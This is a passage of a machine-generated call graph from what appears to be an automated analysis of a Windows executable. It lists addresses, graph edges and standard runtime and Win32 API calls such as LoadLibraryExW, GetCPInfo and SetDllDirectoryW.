19048->19045 19051 7ff7c267b2a5 FlsGetValue 19050->19051 19052 7ff7c267b2c0 FlsSetValue 19050->19052 19054 7ff7c267b2b2 19051->19054 19055 7ff7c267b2ba 19051->19055 19053 7ff7c267b2cd 19052->19053 19052->19054 19057 7ff7c267ec08 memcpy_s 11 API calls 19053->19057 19056 7ff7c267a574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19054->19056 19058 7ff7c267b2b8 19054->19058 19055->19052 19059 7ff7c267b335 19056->19059 19060 7ff7c267b2dc 19057->19060 19070 7ff7c2682334 19058->19070 19061 7ff7c267b2fa FlsSetValue 19060->19061 19062 7ff7c267b2ea FlsSetValue 19060->19062 19064 7ff7c267b318 19061->19064 19065 7ff7c267b306 FlsSetValue 19061->19065 19063 7ff7c267b2f3 19062->19063 19066 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19063->19066 19067 7ff7c267af64 memcpy_s 11 API calls 19064->19067 19065->19063 19066->19054 19068 7ff7c267b320 19067->19068 19069 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19068->19069 19069->19058 19093 7ff7c26825a4 19070->19093 19072 7ff7c2682369 19108 7ff7c2682034 19072->19108 19075 7ff7c267d66c _fread_nolock 12 API calls 19076 7ff7c2682397 19075->19076 19077 7ff7c268239f 19076->19077 19080 7ff7c26823ae 19076->19080 19078 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19077->19078 19079 7ff7c2682386 19078->19079 19079->19007 19115 7ff7c26826dc 19080->19115 19083 7ff7c26824aa 19084 7ff7c2674f78 memcpy_s 11 API calls 19083->19084 19085 7ff7c26824af 19084->19085 19087 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19085->19087 19086 7ff7c2682505 19089 7ff7c268256c 19086->19089 19126 7ff7c2681e64 19086->19126 19087->19079 19088 7ff7c26824c4 19088->19086 19091 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19088->19091 19090 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19089->19090 19090->19079 19091->19086 19094 7ff7c26825c7 19093->19094 19096 7ff7c26825d1 19094->19096 19141 7ff7c2680348 EnterCriticalSection 19094->19141 19097 7ff7c2682643 19096->19097 19100 7ff7c267a574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19096->19100 19097->19072 19102 7ff7c268265b 19100->19102 19104 7ff7c26826b2 19102->19104 19105 7ff7c267b294 50 API calls 19102->19105 19104->19072 19106 7ff7c268269c 19105->19106 19107 7ff7c2682334 65 API calls 19106->19107 19107->19104 19109 7ff7c2674fbc 45 API calls 19108->19109 19110 7ff7c2682048 19109->19110 19111 7ff7c2682066 19110->19111 19112 7ff7c2682054 GetOEMCP 19110->19112 19113 7ff7c268206b GetACP 19111->19113 19114 7ff7c268207b 19111->19114 19112->19114 19113->19114 19114->19075 19114->19079 19116 7ff7c2682034 47 API calls 19115->19116 19117 7ff7c2682709 19116->19117 19118 7ff7c268285f 19117->19118 19120 7ff7c2682746 IsValidCodePage 19117->19120 19124 7ff7c2682760 memcpy_s 19117->19124 19119 7ff7c266c5c0 _log10_special 8 API calls 19118->19119 19121 7ff7c26824a1 19119->19121 19120->19118 19122 7ff7c2682757 19120->19122 19121->19083 19121->19088 19123 7ff7c2682786 GetCPInfo 19122->19123 19122->19124 19123->19118 19123->19124 19142 7ff7c268214c 19124->19142 19208 7ff7c2680348 EnterCriticalSection 19126->19208 19143 7ff7c2682189 GetCPInfo 19142->19143 19152 7ff7c268227f 19142->19152 19148 7ff7c268219c 19143->19148 19143->19152 19144 7ff7c266c5c0 _log10_special 8 API calls 19146 7ff7c268231e 19144->19146 19145 7ff7c2682eb0 48 API calls 19147 7ff7c2682213 19145->19147 19146->19118 19153 7ff7c2687bf4 19147->19153 19148->19145 19151 7ff7c2687bf4 54 API calls 19151->19152 19152->19144 19154 7ff7c2674fbc 45 API calls 19153->19154 19155 7ff7c2687c19 19154->19155 19158 7ff7c26878c0 19155->19158 19159 7ff7c2687901 19158->19159 19160 7ff7c267f910 _fread_nolock MultiByteToWideChar 19159->19160 19163 7ff7c268794b 19160->19163 19161 7ff7c2687bc9 19162 7ff7c266c5c0 _log10_special 8 API calls 19161->19162 19164 7ff7c2682246 19162->19164 19163->19161 19165 7ff7c267d66c _fread_nolock 12 API calls 19163->19165 19166 7ff7c2687a81 19163->19166 19168 7ff7c2687983 19163->19168 19164->19151 19165->19168 19166->19161 19167 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19166->19167 19167->19161 19168->19166 19169 7ff7c267f910 _fread_nolock MultiByteToWideChar 19168->19169 19170 7ff7c26879f6 19169->19170 19170->19166 19189 7ff7c267f154 19170->19189 19173 7ff7c2687a92 19175 7ff7c267d66c _fread_nolock 12 API calls 19173->19175 19177 7ff7c2687b64 19173->19177 19178 7ff7c2687ab0 19173->19178 19174 7ff7c2687a41 19174->19166 19176 7ff7c267f154 __crtLCMapStringW 6 API calls 19174->19176 19175->19178 19176->19166 19177->19166 19179 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19177->19179 19178->19166 19180 7ff7c267f154 __crtLCMapStringW 6 API calls 19178->19180 19179->19166 19181 7ff7c2687b30 19180->19181 19181->19177 19182 7ff7c2687b66 19181->19182 19183 7ff7c2687b50 19181->19183 19184 7ff7c2680858 WideCharToMultiByte 19182->19184 19185 7ff7c2680858 WideCharToMultiByte 19183->19185 19186 7ff7c2687b5e 19184->19186 19185->19186 19186->19177 19187 7ff7c2687b7e 19186->19187 19187->19166 19188 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19187->19188 19188->19166 19195 7ff7c267ed80 19189->19195 19193 7ff7c267f203 LCMapStringW 19194 7ff7c267f19a 19193->19194 19194->19166 19194->19173 19194->19174 19196 7ff7c267eddd 19195->19196 19203 7ff7c267edd8 __vcrt_FlsAlloc 19195->19203 19196->19194 19205 7ff7c267f240 19196->19205 19197 7ff7c267ee0d LoadLibraryExW 19199 7ff7c267eee2 19197->19199 19200 7ff7c267ee32 GetLastError 19197->19200 19198 7ff7c267ef02 GetProcAddress 19198->19196 19202 7ff7c267ef13 19198->19202 19199->19198 19201 7ff7c267eef9 FreeLibrary 19199->19201 19200->19203 19201->19198 19202->19196 19203->19196 19203->19197 19203->19198 19204 7ff7c267ee6c LoadLibraryExW 19203->19204 19204->19199 19204->19203 19206 7ff7c267ed80 __crtLCMapStringW 5 API calls 19205->19206 19207 7ff7c267f26e __crtLCMapStringW 19206->19207 19207->19193 19213 7ff7c267951d 19209->19213 19214 7ff7c26793b9 19209->19214 19210 7ff7c2679546 19212 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19210->19212 19211 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19211->19213 19212->19214 19213->19210 19213->19211 19214->19046 19216 7ff7c2686348 19215->19216 19217 7ff7c2686331 19215->19217 19216->19217 19220 7ff7c2686356 19216->19220 19218 7ff7c2674f78 memcpy_s 11 API calls 19217->19218 19219 7ff7c2686336 19218->19219 19222 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 19219->19222 19221 7ff7c2686341 19220->19221 19223 7ff7c2674fbc 45 API calls 19220->19223 19221->18882 19222->19221 19223->19221 19225 7ff7c2674fbc 45 API calls 19224->19225 19226 7ff7c2688fe1 19225->19226 19229 7ff7c2688c38 19226->19229 19232 7ff7c2688c86 19229->19232 19230 7ff7c266c5c0 _log10_special 8 API calls 19231 7ff7c2687275 19230->19231 19231->18882 19231->18908 19233 7ff7c2688d0d 19232->19233 19235 7ff7c2688cf8 GetCPInfo 19232->19235 19238 7ff7c2688d11 19232->19238 19234 7ff7c267f910 _fread_nolock MultiByteToWideChar 19233->19234 19233->19238 19236 7ff7c2688da5 19234->19236 19235->19233 19235->19238 19237 7ff7c267d66c _fread_nolock 12 API calls 19236->19237 19236->19238 19239 7ff7c2688ddc 19236->19239 19237->19239 19238->19230 19239->19238 19240 7ff7c267f910 _fread_nolock MultiByteToWideChar 19239->19240 19241 7ff7c2688e4a 19240->19241 19242 7ff7c2688f2c 19241->19242 19243 7ff7c267f910 _fread_nolock MultiByteToWideChar 19241->19243 19242->19238 19244 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19242->19244 19245 7ff7c2688e70 19243->19245 19244->19238 19245->19242 19246 7ff7c267d66c _fread_nolock 12 API calls 19245->19246 19247 7ff7c2688e9d 19245->19247 19246->19247 19247->19242 19248 7ff7c267f910 _fread_nolock MultiByteToWideChar 19247->19248 19249 7ff7c2688f14 19248->19249 19250 7ff7c2688f34 19249->19250 19251 7ff7c2688f1a 19249->19251 19258 7ff7c267efd8 19250->19258 19251->19242 19253 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19251->19253 19253->19242 19255 7ff7c2688f73 19255->19238 19257 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19255->19257 19256 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19256->19255 19257->19238 19259 7ff7c267ed80 __crtLCMapStringW 5 API calls 19258->19259 19261 7ff7c267f016 19259->19261 19260 7ff7c267f01e 19260->19255 19260->19256 19261->19260 19262 7ff7c267f240 __crtLCMapStringW 5 API calls 19261->19262 19263 7ff7c267f087 CompareStringW 19262->19263 19263->19260 19265 7ff7c2687cca HeapSize 19264->19265 19266 7ff7c2687cb1 19264->19266 19267 7ff7c2674f78 memcpy_s 11 API calls 19266->19267 19268 7ff7c2687cb6 19267->19268 19269 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 19268->19269 19270 7ff7c2687cc1 19269->19270 19270->18913 19272 7ff7c2687cf9 19271->19272 19273 7ff7c2687d03 19271->19273 19275 7ff7c267d66c _fread_nolock 12 API calls 19272->19275 19274 7ff7c2687d08 19273->19274 19282 7ff7c2687d0f memcpy_s 19273->19282 19277 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19274->19277 19276 7ff7c2687d01 19275->19276 19276->18917 19277->19276 19278 7ff7c2687d15 19280 7ff7c2674f78 memcpy_s 11 API calls 19278->19280 19279 7ff7c2687d42 HeapReAlloc 19279->19276 19279->19282 19280->19276 19281 7ff7c2683600 memcpy_s 2 API calls 19281->19282 19282->19278 19282->19279 19282->19281 19284 7ff7c267ed80 __crtLCMapStringW 5 API calls 19283->19284 19285 7ff7c267efb4 19284->19285 19285->18921 19287 7ff7c267556a 19286->19287 19288 7ff7c2675546 19286->19288 19289 7ff7c26755c4 19287->19289 19290 7ff7c267556f 19287->19290 19292 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19288->19292 19294 7ff7c2675555 19288->19294 19291 7ff7c267f910 _fread_nolock MultiByteToWideChar 19289->19291 19290->19294 19295 7ff7c2675584 19290->19295 19297 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19290->19297 19293 7ff7c26755e0 19291->19293 19292->19294 19296 7ff7c26755e7 GetLastError 19293->19296 19302 7ff7c2675615 19293->19302 19305 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19293->19305 19307 7ff7c2675622 19293->19307 19294->18925 19294->18926 19298 7ff7c267d66c _fread_nolock 12 API calls 19295->19298 19299 7ff7c2674eec _fread_nolock 11 API calls 19296->19299 19297->19295 19298->19294 19301 7ff7c26755f4 19299->19301 19300 7ff7c267f910 _fread_nolock MultiByteToWideChar 19303 7ff7c2675666 19300->19303 19304 7ff7c2674f78 memcpy_s 11 API calls 19301->19304 19306 7ff7c267d66c _fread_nolock 12 API calls 19302->19306 19303->19294 19303->19296 19304->19294 19305->19302 19306->19307 19307->19294 19307->19300 19309 7ff7c2679295 19308->19309 19310 7ff7c2679291 19308->19310 19329 7ff7c2682aac GetEnvironmentStringsW 19309->19329 19310->18955 19321 7ff7c267963c 19310->19321 19313 7ff7c26792ae 19336 7ff7c26793fc 19313->19336 19314 7ff7c26792a2 19315 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19314->19315 19315->19310 19318 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19319 7ff7c26792d5 19318->19319 19320 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19319->19320 19320->19310 19322 7ff7c267965f 19321->19322 19327 7ff7c2679676 19321->19327 19322->18955 19323 7ff7c267ec08 memcpy_s 11 API calls 19323->19327 19324 7ff7c26796ea 19326 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19324->19326 19325 7ff7c267f910 MultiByteToWideChar _fread_nolock 19325->19327 19326->19322 19327->19322 19327->19323 19327->19324 19327->19325 19328 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19327->19328 19328->19327 19330 7ff7c267929a 19329->19330 19331 7ff7c2682ad0 19329->19331 19330->19313 19330->19314 19332 7ff7c267d66c _fread_nolock 12 API calls 19331->19332 19334 7ff7c2682b07 memcpy_s 19332->19334 19333 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19335 7ff7c2682b27 FreeEnvironmentStringsW 19333->19335 19334->19333 19335->19330 19337 7ff7c2679424 19336->19337 19338 7ff7c267ec08 memcpy_s 11 API calls 19337->19338 19339 7ff7c267945f 19338->19339 19341 7ff7c26794e1 19339->19341 19344 7ff7c267ec08 memcpy_s 11 API calls 19339->19344 19345 7ff7c26794d0 19339->19345 19346 7ff7c26804e4 37 API calls 19339->19346 19349 7ff7c2679504 19339->19349 19352 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19339->19352 19353 7ff7c2679467 19339->19353 19340 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19343 7ff7c26792b6 19340->19343 19342 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19341->19342 19342->19343 19343->19318 19344->19339 19347 7ff7c2679518 11 API calls 19345->19347 19346->19339 19348 7ff7c26794d8 19347->19348 19350 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19348->19350 19351 7ff7c267a970 _isindst 17 API calls 19349->19351 19350->19353 19354 7ff7c2679516 19351->19354 19352->19339 19353->19340 19356 7ff7c2688ba1 __crtLCMapStringW 19355->19356 19357 7ff7c268715e 19356->19357 19358 7ff7c267efd8 6 API calls 19356->19358 19357->18980 19357->18981 19358->19357 19906 7ff7c2679dc0 19909 7ff7c2679d3c 19906->19909 19916 7ff7c2680348 EnterCriticalSection 19909->19916 20073 7ff7c267b040 20074 7ff7c267b045 20073->20074 20078 7ff7c267b05a 20073->20078 20079 7ff7c267b060 20074->20079 20080 7ff7c267b0a2 20079->20080 20083 7ff7c267b0aa 20079->20083 20081 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20080->20081 20081->20083 20082 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20084 7ff7c267b0b7 20082->20084 20083->20082 20085 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20084->20085 20086 7ff7c267b0c4 20085->20086 20087 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20086->20087 20088 7ff7c267b0d1 20087->20088 20089 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20088->20089 20090 7ff7c267b0de 20089->20090 20091 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20090->20091 20092 7ff7c267b0eb 20091->20092 20093 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20092->20093 20094 7ff7c267b0f8 20093->20094 20095 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20094->20095 20096 7ff7c267b105 20095->20096 20097 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20096->20097 20098 7ff7c267b115 20097->20098 20099 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20098->20099 20100 7ff7c267b125 20099->20100 20105 7ff7c267af04 20100->20105 20119 7ff7c2680348 EnterCriticalSection 20105->20119 19920 7ff7c266cbc0 19921 7ff7c266cbd0 19920->19921 19937 7ff7c2679c18 19921->19937 19923 7ff7c266cbdc 19943 7ff7c266ceb8 19923->19943 19925 7ff7c266cc49 19926 7ff7c266d19c 7 API calls 19925->19926 19936 7ff7c266cc65 19925->19936 19928 7ff7c266cc75 19926->19928 19927 7ff7c266cbf4 _RTC_Initialize 19927->19925 19948 7ff7c266d068 19927->19948 19930 7ff7c266cc09 19951 7ff7c2679084 19930->19951 19938 7ff7c2679c29 19937->19938 19939 7ff7c2674f78 memcpy_s 11 API calls 19938->19939 19942 7ff7c2679c31 19938->19942 19940 7ff7c2679c40 19939->19940 19941 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 19940->19941 19941->19942 19942->19923 19944 7ff7c266cec9 19943->19944 19947 7ff7c266cece __scrt_acquire_startup_lock 19943->19947 19945 7ff7c266d19c 7 API calls 19944->19945 19944->19947 19946 7ff7c266cf42 19945->19946 19947->19927 19976 7ff7c266d02c 19948->19976 19950 7ff7c266d071 19950->19930 19952 7ff7c26790a4 19951->19952 19966 7ff7c266cc15 19951->19966 19953 7ff7c26790ac 19952->19953 19954 7ff7c26790c2 GetModuleFileNameW 19952->19954 19955 7ff7c2674f78 memcpy_s 11 API calls 19953->19955 19958 7ff7c26790ed 19954->19958 19956 7ff7c26790b1 19955->19956 19957 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 19956->19957 19957->19966 19991 7ff7c2679024 19958->19991 19961 7ff7c2679135 19962 7ff7c2674f78 memcpy_s 11 API calls 19961->19962 19963 7ff7c267913a 19962->19963 19964 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19963->19964 19964->19966 19965 7ff7c267914d 19968 7ff7c267919b 19965->19968 19969 7ff7c26791b4 19965->19969 19974 7ff7c267916f 19965->19974 19966->19925 19975 7ff7c266d13c InitializeSListHead 19966->19975 19967 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19967->19966 19970 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19968->19970 19972 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19969->19972 19971 7ff7c26791a4 19970->19971 19973 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19971->19973 19972->19974 19973->19966 19974->19967 19977 7ff7c266d046 19976->19977 19979 7ff7c266d03f 19976->19979 19980 7ff7c267a25c 19977->19980 19979->19950 19983 7ff7c2679e98 19980->19983 19990 7ff7c2680348 EnterCriticalSection 19983->19990 19992 7ff7c267903c 19991->19992 19996 7ff7c2679074 19991->19996 19993 7ff7c267ec08 memcpy_s 11 API calls 19992->19993 19992->19996 19994 7ff7c267906a 19993->19994 19995 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19994->19995 19995->19996 19996->19961 19996->19965 15918 7ff7c266ccac 15939 7ff7c266ce7c 15918->15939 15921 7ff7c266cdf8 16093 7ff7c266d19c IsProcessorFeaturePresent 15921->16093 15922 7ff7c266ccc8 __scrt_acquire_startup_lock 15924 7ff7c266ce02 15922->15924 15929 7ff7c266cce6 __scrt_release_startup_lock 15922->15929 15925 7ff7c266d19c 7 API calls 15924->15925 15927 7ff7c266ce0d __FrameHandler3::FrameUnwindToEmptyState 15925->15927 15926 7ff7c266cd0b 15928 7ff7c266cd91 15945 7ff7c266d2e4 15928->15945 15929->15926 15929->15928 16082 7ff7c2679b9c 15929->16082 15931 7ff7c266cd96 15948 7ff7c2661000 15931->15948 15936 7ff7c266cdb9 15936->15927 16089 7ff7c266d000 15936->16089 15940 7ff7c266ce84 15939->15940 15941 7ff7c266ce90 __scrt_dllmain_crt_thread_attach 15940->15941 15942 7ff7c266ce9d 15941->15942 15943 7ff7c266ccc0 15941->15943 15942->15943 16100 7ff7c266d8f8 15942->16100 15943->15921 15943->15922 16127 7ff7c268a540 15945->16127 15949 7ff7c2661009 15948->15949 16129 7ff7c26754f4 15949->16129 15951 7ff7c26637fb 16136 7ff7c26636b0 15951->16136 15957 7ff7c266383c 16303 7ff7c2661c80 15957->16303 15958 7ff7c266391b 16312 7ff7c26645b0 15958->16312 15962 7ff7c266385b 16208 7ff7c2668a20 15962->16208 15965 7ff7c266396a 16335 7ff7c2662710 15965->16335 15967 7ff7c266388e 15975 7ff7c26638bb __std_exception_destroy 15967->15975 16307 7ff7c2668b90 15967->16307 15969 7ff7c266395d 15970 7ff7c2663984 15969->15970 15971 7ff7c2663962 15969->15971 15973 7ff7c2661c80 49 API calls 15970->15973 16331 7ff7c26700bc 15971->16331 15976 7ff7c26639a3 15973->15976 15977 7ff7c2668a20 14 API calls 15975->15977 15984 7ff7c26638de __std_exception_destroy 15975->15984 15981 7ff7c2661950 115 API calls 15976->15981 15977->15984 15978 7ff7c2668b30 40 API calls 15979 7ff7c2663a0b 15978->15979 15980 7ff7c2668b90 40 API calls 15979->15980 15982 7ff7c2663a17 15980->15982 15983 7ff7c26639ce 15981->15983 15985 7ff7c2668b90 40 API calls 15982->15985 15983->15962 15986 7ff7c26639de 15983->15986 15984->15978 15990 7ff7c266390e __std_exception_destroy 15984->15990 15987 7ff7c2663a23 15985->15987 15988 7ff7c2662710 54 API calls 15986->15988 15989 7ff7c2668b90 40 API calls 15987->15989 16030 7ff7c2663808 __std_exception_destroy 15988->16030 15989->15990 15991 7ff7c2668a20 14 API calls 15990->15991 15992 7ff7c2663a3b 15991->15992 15993 7ff7c2663b2f 15992->15993 15994 7ff7c2663a60 __std_exception_destroy 15992->15994 15995 7ff7c2662710 54 API calls 15993->15995 16007 7ff7c2663aab 15994->16007 16221 7ff7c2668b30 15994->16221 15995->16030 15997 7ff7c2668a20 14 API calls 15998 7ff7c2663bf4 __std_exception_destroy 15997->15998 15999 7ff7c2663c46 15998->15999 16000 7ff7c2663d41 15998->16000 16001 7ff7c2663cd4 15999->16001 16002 7ff7c2663c50 15999->16002 16355 7ff7c26644d0 16000->16355 16005 7ff7c2668a20 14 API calls 16001->16005 16228 7ff7c26690e0 16002->16228 16009 7ff7c2663ce0 16005->16009 16006 7ff7c2663d4f 16010 7ff7c2663d65 16006->16010 16011 7ff7c2663d71 16006->16011 16007->15997 16012 7ff7c2663c61 16009->16012 16015 7ff7c2663ced 16009->16015 16358 7ff7c2664620 16010->16358 16014 7ff7c2661c80 49 API calls 16011->16014 16017 7ff7c2662710 54 API calls 16012->16017 16024 7ff7c2663cc8 __std_exception_destroy 16014->16024 16018 7ff7c2661c80 49 API calls 16015->16018 16017->16030 16021 7ff7c2663d0b 16018->16021 16019 7ff7c2663dc4 16278 7ff7c2669400 16019->16278 16021->16024 16025 7ff7c2663d12 16021->16025 16023 7ff7c2663dd7 SetDllDirectoryW 16029 7ff7c2663e0a 16023->16029 16033 7ff7c2663e5a 16023->16033 16024->16019 16026 7ff7c2663da7 SetDllDirectoryW LoadLibraryExW 16024->16026 16028 7ff7c2662710 54 API calls 16025->16028 16026->16019 16028->16030 16031 7ff7c2668a20 14 API calls 16029->16031 16346 7ff7c266c5c0 16030->16346 16040 7ff7c2663e16 __std_exception_destroy 16031->16040 16032 7ff7c2663ffc 16035 7ff7c2664029 16032->16035 16036 7ff7c2664006 PostMessageW GetMessageW 16032->16036 16033->16032 16034 7ff7c2663f1b 16033->16034 16283 7ff7c26633c0 16034->16283 16435 7ff7c2663360 16035->16435 16036->16035 16043 7ff7c2663ef2 16040->16043 16047 7ff7c2663e4e 16040->16047 16046 7ff7c2668b30 40 API calls 16043->16046 16046->16033 16047->16033 16361 7ff7c2666db0 16047->16361 16083 7ff7c2679bd4 16082->16083 16084 7ff7c2679bb3 16082->16084 18672 7ff7c267a448 16083->18672 16084->15928 16087 7ff7c266d328 GetModuleHandleW 16088 7ff7c266d339 16087->16088 16088->15936 16090 7ff7c266d011 16089->16090 16091 7ff7c266cdd0 16090->16091 16092 7ff7c266d8f8 7 API calls 16090->16092 16091->15926 16092->16091 16094 7ff7c266d1c2 _isindst memcpy_s 16093->16094 16095 7ff7c266d1e1 RtlCaptureContext RtlLookupFunctionEntry 16094->16095 16096 7ff7c266d20a RtlVirtualUnwind 16095->16096 16097 7ff7c266d246 memcpy_s 16095->16097 16096->16097 16098 7ff7c266d278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16097->16098 16099 7ff7c266d2c6 _isindst 16098->16099 16099->15924 16101 7ff7c266d90a 16100->16101 16102 7ff7c266d900 16100->16102 16101->15943 16106 7ff7c266dc94 16102->16106 16107 7ff7c266dca3 16106->16107 16108 7ff7c266d905 16106->16108 16114 7ff7c266ded0 16107->16114 16110 7ff7c266dd00 16108->16110 16111 7ff7c266dd2b 16110->16111 16112 7ff7c266dd0e DeleteCriticalSection 16111->16112 16113 7ff7c266dd2f 16111->16113 16112->16111 16113->16101 16118 7ff7c266dd38 16114->16118 16124 7ff7c266de22 TlsFree 16118->16124 16125 7ff7c266dd7c __vcrt_FlsAlloc 16118->16125 16119 7ff7c266ddaa LoadLibraryExW 16121 7ff7c266ddcb GetLastError 16119->16121 16122 7ff7c266de49 16119->16122 16120 7ff7c266de69 GetProcAddress 16120->16124 16121->16125 16122->16120 16123 7ff7c266de60 FreeLibrary 16122->16123 16123->16120 16125->16119 16125->16120 16125->16124 16126 7ff7c266dded LoadLibraryExW 16125->16126 16126->16122 16126->16125 16128 7ff7c266d2fb GetStartupInfoW 16127->16128 16128->15931 16130 7ff7c267f4f0 16129->16130 16132 7ff7c267f596 16130->16132 16133 7ff7c267f543 16130->16133 16458 7ff7c267f3c8 16132->16458 16448 7ff7c267a884 16133->16448 16135 7ff7c267f56c 16135->15951 16565 7ff7c266c8c0 16136->16565 16139 7ff7c26636eb GetLastError 16572 7ff7c2662c50 16139->16572 16140 7ff7c2663710 16567 7ff7c26692f0 FindFirstFileExW 16140->16567 16144 7ff7c266377d 16598 7ff7c26694b0 16144->16598 16145 7ff7c2663723 16587 7ff7c2669370 CreateFileW 16145->16587 16147 7ff7c266c5c0 _log10_special 8 API calls 16149 7ff7c26637b5 16147->16149 16149->16030 16158 7ff7c2661950 16149->16158 16151 7ff7c2663706 16151->16147 16152 7ff7c266378b 16152->16151 16155 7ff7c2662810 49 API calls 16152->16155 16153 7ff7c266374c __vcrt_FlsAlloc 16153->16144 16154 7ff7c2663734 16590 7ff7c2662810 16154->16590 16155->16151 16159 7ff7c26645b0 108 API calls 16158->16159 16160 7ff7c2661985 16159->16160 16161 7ff7c2661c43 16160->16161 16163 7ff7c2667f80 83 API calls 16160->16163 16162 7ff7c266c5c0 _log10_special 8 API calls 16161->16162 16164 7ff7c2661c5e 16162->16164 16165 7ff7c26619cb 16163->16165 16164->15957 16164->15958 16178 7ff7c2661a03 16165->16178 17003 7ff7c2670744 16165->17003 16167 7ff7c26700bc 74 API calls 16167->16161 16168 7ff7c26619e5 16169 7ff7c2661a08 16168->16169 16170 7ff7c26619e9 16168->16170 17007 7ff7c267040c 16169->17007 16171 7ff7c2674f78 memcpy_s 11 API calls 16170->16171 16173 7ff7c26619ee 16171->16173 17010 7ff7c2662910 16173->17010 16176 7ff7c2661a26 16179 7ff7c2674f78 memcpy_s 11 API calls 16176->16179 16177 7ff7c2661a45 16182 7ff7c2661a5c 16177->16182 16183 7ff7c2661a7b 16177->16183 16178->16167 16180 7ff7c2661a2b 16179->16180 16181 7ff7c2662910 54 API calls 16180->16181 16181->16178 16184 7ff7c2674f78 memcpy_s 11 API calls 16182->16184 16185 7ff7c2661c80 49 API calls 16183->16185 16186 7ff7c2661a61 16184->16186 16187 7ff7c2661a92 16185->16187 16188 7ff7c2662910 54 API calls 16186->16188 16189 7ff7c2661c80 49 API calls 16187->16189 16188->16178 16190 7ff7c2661add 16189->16190 16191 7ff7c2670744 73 API calls 16190->16191 16192 7ff7c2661b01 16191->16192 16193 7ff7c2661b16 16192->16193 16194 7ff7c2661b35 16192->16194 16196 7ff7c2674f78 memcpy_s 11 API calls 16193->16196 16195 7ff7c267040c _fread_nolock 53 API calls 16194->16195 16197 7ff7c2661b4a 16195->16197 16198 7ff7c2661b1b 16196->16198 16200 7ff7c2661b50 16197->16200 16201 7ff7c2661b6f 16197->16201 16199 7ff7c2662910 54 API calls 16198->16199 16199->16178 16202 7ff7c2674f78 memcpy_s 11 API calls 16200->16202 17025 7ff7c2670180 16201->17025 16204 7ff7c2661b55 16202->16204 16206 7ff7c2662910 54 API calls 16204->16206 16206->16178 16207 7ff7c2662710 54 API calls 16207->16178 16209 7ff7c2668a2a 16208->16209 16210 7ff7c2669400 2 API calls 16209->16210 16211 7ff7c2668a49 GetEnvironmentVariableW 16210->16211 16212 7ff7c2668a66 ExpandEnvironmentStringsW 16211->16212 16213 7ff7c2668ab2 16211->16213 16212->16213 16215 7ff7c2668a88 16212->16215 16214 7ff7c266c5c0 _log10_special 8 API calls 16213->16214 16216 7ff7c2668ac4 16214->16216 16217 7ff7c26694b0 2 API calls 16215->16217 16216->15967 16218 7ff7c2668a9a 16217->16218 16219 7ff7c266c5c0 _log10_special 8 API calls 16218->16219 16220 7ff7c2668aaa 16219->16220 16220->15967 16222 7ff7c2669400 2 API calls 16221->16222 16223 7ff7c2668b4c 16222->16223 